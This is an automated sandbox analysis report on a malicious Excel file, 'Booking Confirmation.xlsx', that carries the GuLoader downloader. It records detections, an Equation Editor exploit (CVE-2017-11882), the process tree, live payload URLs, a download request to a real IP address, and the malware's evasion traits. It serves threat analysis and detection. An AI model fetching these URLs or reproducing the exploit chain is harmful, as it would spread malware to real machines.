Play interactive tour

Edit tour

Analysis Report Booking Confirmation.xlsx

Overview

General Information

Sample Name:	Booking Confirmation.xlsx
Analysis ID:	433966
MD5:	0ff57b2fd3fb489d3cca1e3de4fc98ea
SHA1:	48f428a33c81e6647c399a50a71e5ee03c1c2ef9
SHA256:	36e8b5e6839f88f144b51f690004f0464368d437d099fa74534fe1a6223a6ed2
Tags:	VelvetSweatshopxlsx
Infos:
Most interesting Screenshot:

Detection

GuLoader

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Antivirus detection for dropped file

Found malware configuration

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Sigma detected: Droppers Exploiting CVE-2017-11882

Sigma detected: EQNEDT32.EXE connecting to internet

Sigma detected: File Dropped By EQNEDT32EXE

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Yara detected GuLoader

C2 URLs / IPs found in malware configuration

Contains functionality to detect hardware virtualization (CPUID execution measurement)

Detected RDTSC dummy instruction sequence (likely for instruction hammering)

Drops PE files to the user root directory

Office equation editor drops PE file

Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)

Sigma detected: Execution from Suspicious Folder

Tries to detect virtualization through RDTSC time measurements

Abnormal high CPU Usage

Allocates a big amount of memory (probably used for heap spraying)

Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)

Contains functionality for execution timing, often used to detect debuggers

Contains functionality to call native functions

Contains functionality to read the PEB

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Document misses a certain OLE stream usually present in this Microsoft Office document type

Downloads executable code via HTTP

Drops PE files

Drops PE files to the user directory

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Office Equation Editor has been started

PE file contains strange resources

Potential document exploit detected (performs HTTP gets)

Potential document exploit detected (unknown TCP traffic)

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

System is w7x64

EXCEL.EXE (PID: 2404 cmdline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding MD5: 5FB0A0F93382ECD19F5F499A5CAA59F0)

EQNEDT32.EXE (PID: 2616 cmdline: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)

vbc.exe (PID: 2760 cmdline: 'C:\Users\Public\vbc.exe' MD5: EE83942376EA5717149517FCC832AB9F)

cleanup

Malware Configuration

Threatname: GuLoader

{"Payload URL": "https://bara-seck.com/bin_NpuMLUuCfC62.bin, http://farmersschool.ge/bin_NpuMLUuCfC62.bin"}

Yara Overview

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
dump.pcap	JoeSecurity_GuLoader_1	Yara detected GuLoader	Joe Security

Dropped Files

Source	Rule	Description	Author	Strings
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\svchost[1].exe	JoeSecurity_GuLoader_1	Yara detected GuLoader	Joe Security
C:\Users\Public\vbc.exe	JoeSecurity_GuLoader_1	Yara detected GuLoader	Joe Security

Memory Dumps

Source	Rule	Description	Author	Strings
00000004.00000002.2370080916.00000000003C0000.00000040.00000001.sdmp	JoeSecurity_GuLoader_2	Yara detected GuLoader	Joe Security

Unpacked PEs

Source	Rule	Description	Author	Strings
4.0.vbc.exe.400000.0.unpack	JoeSecurity_GuLoader_1	Yara detected GuLoader	Joe Security
4.2.vbc.exe.400000.1.unpack	JoeSecurity_GuLoader_1	Yara detected GuLoader	Joe Security

Sigma Overview

Exploits:

Sigma detected: EQNEDT32.EXE connecting to internet

Show sources

Source: Network Connection

Author: Joe Security: Data: DestinationIp: 103.155.82.236, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 2616, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49167

Sigma detected: File Dropped By EQNEDT32EXE

Show sources

Source: File created

Author: Joe Security: Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 2616, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\svchost[1].exe

System Summary:

Sigma detected: Droppers Exploiting CVE-2017-11882

Show sources

Source: Process started

Author: Florian Roth: Data: Command: 'C:\Users\Public\vbc.exe' , CommandLine: 'C:\Users\Public\vbc.exe' , CommandLine|base64offset|contains: , Image: C:\Users\Public\vbc.exe, NewProcessName: C:\Users\Public\vbc.exe, OriginalFileName: C:\Users\Public\vbc.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2616, ProcessCommandLine: 'C:\Users\Public\vbc.exe' , ProcessId: 2760

Sigma detected: Execution from Suspicious Folder

Show sources

Source: Process started

Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Antivirus detection for URL or domain

Show sources

Source: https://bara-seck.com/bin_NpuMLUuCfC62.bin, http://farmersschool.ge/bin_NpuMLUuCfC62.bin

Avira URL Cloud: Label: malware

Antivirus detection for dropped file

Show sources

Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\svchost[1].exe	Avira: detection malicious, Label: HEUR/AGEN.1134908
Source: C:\Users\Public\vbc.exe	Avira: detection malicious, Label: HEUR/AGEN.1134908

Found malware configuration

Show sources

Source: 00000004.00000002.2370080916.00000000003C0000.00000040.00000001.sdmp

Malware Configuration Extractor: GuLoader {"Payload URL": "https://bara-seck.com/bin_NpuMLUuCfC62.bin, http://farmersschool.ge/bin_NpuMLUuCfC62.bin"}

Multi AV Scanner detection for dropped file

Show sources

Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\svchost[1].exe	Virustotal: Detection: 28%			Perma Link
Source: C:\Users\Public\vbc.exe	Virustotal: Detection: 28%			Perma Link

Multi AV Scanner detection for submitted file

Show sources

Source: Booking Confirmation.xlsx

ReversingLabs: Detection: 26%

Exploits:

Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)

Show sources

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe			Jump to behavior

Source: unknown

Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Source: excel.exe

Memory has grown: Private usage: 4MB later: 70MB

Source: global traffic

TCP traffic: 192.168.2.22:49167 -> 103.155.82.236:80

Source: global traffic

TCP traffic: 192.168.2.22:49167 -> 103.155.82.236:80

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Show sources

Source: Traffic

Snort IDS: 2022550 ET TROJAN Possible Malicious Macro DL EXE Feb 2016 192.168.2.22:49167 -> 103.155.82.236:80

C2 URLs / IPs found in malware configuration

Show sources

Source: Malware configuration extractor

URLs: https://bara-seck.com/bin_NpuMLUuCfC62.bin, http://farmersschool.ge/bin_NpuMLUuCfC62.bin

Source: global traffic

HTTP traffic detected: HTTP/1.1 200 OKDate: Mon, 14 Jun 2021 06:54:23 GMTServer: Apache/2.4.47 (Win64) OpenSSL/1.1.1k PHP/7.3.28Last-Modified: Sun, 13 Jun 2021 20:01:48 GMTETag: "24000-5c4ab36086dc4"Accept-Ranges: bytesContent-Length: 147456Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 8b 23 c4 db cf 42 aa 88 cf 42 aa 88 cf 42 aa 88 4c 5e a4 88 ce 42 aa 88 80 60 a3 88 cd 42 aa 88 f9 64 a7 88 ce 42 aa 88 52 69 63 68 cf 42 aa 88 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 40 bb 60 52 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 06 00 00 10 02 00 00 30 00 00 00 00 00 00 a4 18 00 00 00 10 00 00 00 20 02 00 00 00 40 00 00 10 00 00 00 10 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 50 02 00 00 10 00 00 05 58 02 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 c4 17 02 00 28 00 00 00 00 40 02 00 30 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 28 02 00 00 20 00 00 00 00 10 00 00 dc 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 9c 0e 02 00 00 10 00 00 00 10 02 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 78 12 00 00 00 20 02 00 00 10 00 00 00 20 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 30 09 00 00 00 40 02 00 00 10 00 00 00 30 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 c3 1f b0 49 10 00 00 00 00 00 00 00 00 00 00 00 4d 53 56 42 56 4d 36 30 2e 44 4c 4c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0

Source: Joe Sandbox View

ASN Name: TWIDC-AS-APTWIDCLimitedHK TWIDC-AS-APTWIDCLimitedHK

Source: global traffic

HTTP traffic detected: GET /nrsdoc/svchost.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 103.155.82.236Connection: Keep-Alive

Source: unknown	TCP traffic detected without corresponding DNS query: 103.155.82.236
Source: unknown	TCP traffic detected without corresponding DNS query: 103.155.82.236
Source: unknown	TCP traffic detected without corresponding DNS query: 103.155.82.236
Source: unknown	TCP traffic detected without corresponding DNS query: 103.155.82.236
Source: unknown	TCP traffic detected without corresponding DNS query: 103.155.82.236
Source: unknown	TCP traffic detected without corresponding DNS query: 103.155.82.236
Source: unknown	TCP traffic detected without corresponding DNS query: 103.155.82.236
Source: unknown	TCP traffic detected without corresponding DNS query: 103.155.82.236
Source: unknown	TCP traffic detected without corresponding DNS query: 103.155.82.236
Source: unknown	TCP traffic detected without corresponding DNS query: 103.155.82.236
Source: unknown	TCP traffic detected without corresponding DNS query: 103.155.82.236
Source: unknown	TCP traffic detected without corresponding DNS query: 103.155.82.236
Source: unknown	TCP traffic detected without corresponding DNS query: 103.155.82.236
Source: unknown	TCP traffic detected without corresponding DNS query: 103.155.82.236
Source: unknown	TCP traffic detected without corresponding DNS query: 103.155.82.236
Source: unknown	TCP traffic detected without corresponding DNS query: 103.155.82.236
Source: unknown	TCP traffic detected without corresponding DNS query: 103.155.82.236
Source: unknown	TCP traffic detected without corresponding DNS query: 103.155.82.236
Source: unknown	TCP traffic detected without corresponding DNS query: 103.155.82.236
Source: unknown	TCP traffic detected without corresponding DNS query: 103.155.82.236
Source: unknown	TCP traffic detected without corresponding DNS query: 103.155.82.236
Source: unknown	TCP traffic detected without corresponding DNS query: 103.155.82.236
Source: unknown	TCP traffic detected without corresponding DNS query: 103.155.82.236
Source: unknown	TCP traffic detected without corresponding DNS query: 103.155.82.236
Source: unknown	TCP traffic detected without corresponding DNS query: 103.155.82.236
Source: unknown	TCP traffic detected without corresponding DNS query: 103.155.82.236
Source: unknown	TCP traffic detected without corresponding DNS query: 103.155.82.236
Source: unknown	TCP traffic detected without corresponding DNS query: 103.155.82.236
Source: unknown	TCP traffic detected without corresponding DNS query: 103.155.82.236
Source: unknown	TCP traffic detected without corresponding DNS query: 103.155.82.236
Source: unknown	TCP traffic detected without corresponding DNS query: 103.155.82.236
Source: unknown	TCP traffic detected without corresponding DNS query: 103.155.82.236
Source: unknown	TCP traffic detected without corresponding DNS query: 103.155.82.236
Source: unknown	TCP traffic detected without corresponding DNS query: 103.155.82.236
Source: unknown	TCP traffic detected without corresponding DNS query: 103.155.82.236
Source: unknown	TCP traffic detected without corresponding DNS query: 103.155.82.236
Source: unknown	TCP traffic detected without corresponding DNS query: 103.155.82.236
Source: unknown	TCP traffic detected without corresponding DNS query: 103.155.82.236
Source: unknown	TCP traffic detected without corresponding DNS query: 103.155.82.236
Source: unknown	TCP traffic detected without corresponding DNS query: 103.155.82.236
Source: unknown	TCP traffic detected without corresponding DNS query: 103.155.82.236
Source: unknown	TCP traffic detected without corresponding DNS query: 103.155.82.236
Source: unknown	TCP traffic detected without corresponding DNS query: 103.155.82.236
Source: unknown	TCP traffic detected without corresponding DNS query: 103.155.82.236
Source: unknown	TCP traffic detected without corresponding DNS query: 103.155.82.236
Source: unknown	TCP traffic detected without corresponding DNS query: 103.155.82.236
Source: unknown	TCP traffic detected without corresponding DNS query: 103.155.82.236
Source: unknown	TCP traffic detected without corresponding DNS query: 103.155.82.236
Source: unknown	TCP traffic detected without corresponding DNS query: 103.155.82.236
Source: unknown	TCP traffic detected without corresponding DNS query: 103.155.82.236

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\A0F13A2C.emf

Jump to behavior

Source: global traffic

Source: F7B97C3D.emf.0.dr

String found in binary or memory: http://www.day.com/dam/1.0

System Summary:

Office equation editor drops PE file

Show sources

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\Public\vbc.exe			Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\svchost[1].exe			Jump to dropped file

Source: C:\Users\Public\vbc.exe

Process Stats: CPU usage > 98%

Source: C:\Users\Public\vbc.exe	Memory allocated: 76E20000 page execute and read and write			Jump to behavior
Source: C:\Users\Public\vbc.exe	Memory allocated: 76D20000 page execute and read and write			Jump to behavior

Source: C:\Users\Public\vbc.exe	Code function: 4_2_003C6E96 NtAllocateVirtualMemory,	4_2_003C6E96
Source: C:\Users\Public\vbc.exe	Code function: 4_2_003C7008 NtAllocateVirtualMemory,	4_2_003C7008
Source: C:\Users\Public\vbc.exe	Code function: 4_2_003C6E50 NtAllocateVirtualMemory,	4_2_003C6E50
Source: C:\Users\Public\vbc.exe	Code function: 4_2_003C7084 NtAllocateVirtualMemory,	4_2_003C7084
Source: C:\Users\Public\vbc.exe	Code function: 4_2_003C6EE4 NtAllocateVirtualMemory,	4_2_003C6EE4
Source: C:\Users\Public\vbc.exe	Code function: 4_2_003C711E NtAllocateVirtualMemory,	4_2_003C711E
Source: C:\Users\Public\vbc.exe	Code function: 4_2_003C6F73 NtAllocateVirtualMemory,	4_2_003C6F73

Source: C:\Users\Public\vbc.exe	Code function: 4_2_004018A4	4_2_004018A4
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00405732	4_2_00405732
Source: C:\Users\Public\vbc.exe	Code function: 4_2_003C6E96	4_2_003C6E96
Source: C:\Users\Public\vbc.exe	Code function: 4_2_003CB831	4_2_003CB831
Source: C:\Users\Public\vbc.exe	Code function: 4_2_003C7428	4_2_003C7428
Source: C:\Users\Public\vbc.exe	Code function: 4_2_003C482B	4_2_003C482B
Source: C:\Users\Public\vbc.exe	Code function: 4_2_003C3427	4_2_003C3427
Source: C:\Users\Public\vbc.exe	Code function: 4_2_003C3827	4_2_003C3827
Source: C:\Users\Public\vbc.exe	Code function: 4_2_003C2A1C	4_2_003C2A1C
Source: C:\Users\Public\vbc.exe	Code function: 4_2_003C0A1E	4_2_003C0A1E
Source: C:\Users\Public\vbc.exe	Code function: 4_2_003C3C13	4_2_003C3C13
Source: C:\Users\Public\vbc.exe	Code function: 4_2_003C767F	4_2_003C767F
Source: C:\Users\Public\vbc.exe	Code function: 4_2_003C3C73	4_2_003C3C73
Source: C:\Users\Public\vbc.exe	Code function: 4_2_003C6A6F	4_2_003C6A6F
Source: C:\Users\Public\vbc.exe	Code function: 4_2_003CAA61	4_2_003CAA61
Source: C:\Users\Public\vbc.exe	Code function: 4_2_003C2A5F	4_2_003C2A5F
Source: C:\Users\Public\vbc.exe	Code function: 4_2_003C6E50	4_2_003C6E50
Source: C:\Users\Public\vbc.exe	Code function: 4_2_003C3A43	4_2_003C3A43
Source: C:\Users\Public\vbc.exe	Code function: 4_2_003C38A5	4_2_003C38A5
Source: C:\Users\Public\vbc.exe	Code function: 4_2_003C48A3	4_2_003C48A3
Source: C:\Users\Public\vbc.exe	Code function: 4_2_003C6A9F	4_2_003C6A9F
Source: C:\Users\Public\vbc.exe	Code function: 4_2_003C22F7	4_2_003C22F7
Source: C:\Users\Public\vbc.exe	Code function: 4_2_003C6EE4	4_2_003C6EE4
Source: C:\Users\Public\vbc.exe	Code function: 4_2_003C76DF	4_2_003C76DF
Source: C:\Users\Public\vbc.exe	Code function: 4_2_003C3AD7	4_2_003C3AD7
Source: C:\Users\Public\vbc.exe	Code function: 4_2_003C48C5	4_2_003C48C5
Source: C:\Users\Public\vbc.exe	Code function: 4_2_003C333D	4_2_003C333D
Source: C:\Users\Public\vbc.exe	Code function: 4_2_003C4927	4_2_003C4927
Source: C:\Users\Public\vbc.exe	Code function: 4_2_003C7507	4_2_003C7507
Source: C:\Users\Public\vbc.exe	Code function: 4_2_003C757B	4_2_003C757B
Source: C:\Users\Public\vbc.exe	Code function: 4_2_003C3B73	4_2_003C3B73
Source: C:\Users\Public\vbc.exe	Code function: 4_2_003C6F73	4_2_003C6F73
Source: C:\Users\Public\vbc.exe	Code function: 4_2_003C4D68	4_2_003C4D68
Source: C:\Users\Public\vbc.exe	Code function: 4_2_003C3947	4_2_003C3947
Source: C:\Users\Public\vbc.exe	Code function: 4_2_003C39B8	4_2_003C39B8
Source: C:\Users\Public\vbc.exe	Code function: 4_2_003C479E	4_2_003C479E
Source: C:\Users\Public\vbc.exe	Code function: 4_2_003C4D80	4_2_003C4D80
Source: C:\Users\Public\vbc.exe	Code function: 4_2_003C75F7	4_2_003C75F7
Source: C:\Users\Public\vbc.exe	Code function: 4_2_003C37F2	4_2_003C37F2
Source: C:\Users\Public\vbc.exe	Code function: 4_2_003C0BDB	4_2_003C0BDB
Source: C:\Users\Public\vbc.exe	Code function: 4_2_003C47D2	4_2_003C47D2
Source: C:\Users\Public\vbc.exe	Code function: 4_2_003C33CF	4_2_003C33CF

Source: Booking Confirmation.xlsx

OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false

Source: svchost[1].exe.2.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: vbc.exe.2.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST

Source: classification engine

Classification label: mal100.troj.expl.evad.winXLSX@4/17@0/1

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\Desktop\~$Booking Confirmation.xlsx

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Temp\CVRF0B4.tmp

Jump to behavior

Source: C:\Users\Public\vbc.exe

Section loaded: C:\Windows\SysWOW64\msvbvm60.dll

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\Public\vbc.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior

Source: Booking Confirmation.xlsx

ReversingLabs: Detection: 26%

Source: unknown	Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Source: unknown	Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'	Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems

Jump to behavior

Source: Booking Confirmation.xlsx

Static file information: File size 1286656 > 1048576

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Source: Booking Confirmation.xlsx

Initial sample: OLE indicators vbamacros = False

Source: Booking Confirmation.xlsx

Initial sample: OLE indicators encrypted = True

Data Obfuscation:

Yara detected GuLoader

Show sources

Source: Yara match

File source: 00000004.00000002.2370080916.00000000003C0000.00000040.00000001.sdmp, type: MEMORY

Yara detected GuLoader

Show sources

Source: Yara match	File source: dump.pcap, type: PCAP
Source: Yara match	File source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\svchost[1].exe, type: DROPPED
Source: Yara match	File source: C:\Users\Public\vbc.exe, type: DROPPED
Source: Yara match	File source: 4.0.vbc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.vbc.exe.400000.1.unpack, type: UNPACKEDPE

Source: C:\Users\Public\vbc.exe	Code function: 4_2_004059CC pushfd ; iretd	4_2_004059D5
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00406199 push ss; ret	4_2_004062BA
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00407E0A push ecx; iretd	4_2_00407E0C
Source: C:\Users\Public\vbc.exe	Code function: 4_2_004062BD push ss; ret	4_2_004062BA
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00402F0B push dword ptr [ebp-1Ch]; ret	4_2_0041B724
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00409B16 push ecx; retf	4_2_00409B23
Source: C:\Users\Public\vbc.exe	Code function: 4_2_003C1017 push 3966E195h; ret	4_2_003C1021
Source: C:\Users\Public\vbc.exe	Code function: 4_2_003C2C7F push 8566E195h; ret	4_2_003C2C89
Source: C:\Users\Public\vbc.exe	Code function: 4_2_003C1697 push 9EF9818Fh; ret	4_2_003C16A1
Source: C:\Users\Public\vbc.exe	Code function: 4_2_003C6D0B push 3966E195h; retf	4_2_003C6D15
Source: C:\Users\Public\vbc.exe	Code function: 4_2_003C2DEF push F6C88495h; ret	4_2_003C2DF9
Source: C:\Users\Public\vbc.exe	Code function: 4_2_003C05EB push 38BAFB8Fh; ret	4_2_003C05F5
Source: C:\Users\Public\vbc.exe	Code function: 4_2_003C1FE7 push F7BAE195h; ret	4_2_003C1FF1
Source: C:\Users\Public\vbc.exe	Code function: 4_2_003C1DC7 push 38BAE195h; ret	4_2_003C1DD1

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\Public\vbc.exe			Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\svchost[1].exe			Jump to dropped file

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

File created: C:\Users\Public\vbc.exe

Jump to dropped file

Boot Survival:

Drops PE files to the user root directory

Show sources

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

File created: C:\Users\Public\vbc.exe

Jump to dropped file

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
